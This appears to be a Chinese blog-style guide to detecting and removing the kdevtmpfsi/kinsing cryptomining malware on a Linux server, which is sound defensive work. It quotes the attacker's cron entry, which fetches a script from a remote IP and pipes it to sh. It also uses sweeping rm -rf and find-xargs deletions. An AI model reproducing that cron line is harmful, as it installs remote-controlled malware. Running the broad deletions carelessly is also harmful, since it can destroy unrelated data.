病毒名稱:kdevtmpfsi
狀態:CPU爆滿,導致線上服務宕機。
圖片是盜的,進程占用是真實的。
1、# top
查看cpu占用情況,找到占用cpu的進程 最后是 kdevtmpfsi
2、# netstat -natp
根據上面的進程名查看與內網的 tcp 鏈接異常 ,看到陌生ip,查出為國外ip,估計主機被人種后門了
此時,挖礦腳本大概率定時在你的crontab里面。
crontab -l ,發現異常定時任務,* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1
查看這個進程運行狀態
systemctl status 3127
systemctl status 3127
ps -aux | grep kinsing
ps -aux | grep kdevtmpfsi
kill -9 3127
cd /tmp
ls
rm -rf kdevtmpfsi
rm -rf /var/tmp/kinsing 記得這個守護進程的文件也要刪掉,找不到的話,也可以用這個命令
find / -name kdevtmpfsi
find / -name kinsing
進入/var/spool/cron 查看是否有相關的木馬定時任務在執行 有的話刪掉再重啟下crontab
后續工作溯源,找到程序漏洞,封禁訪問ip,不正常ip。源程序下載。
使用clamav對整個Linux做全盤掃描,確定被感染文件並刪除。
查找守護進程文件變種名字。
全部刪除
find / -name "kinsing*" | xargs rm -rf
至此殺毒工作基本進入尾聲。后面幾天觀察服務器服務,進程是否異常。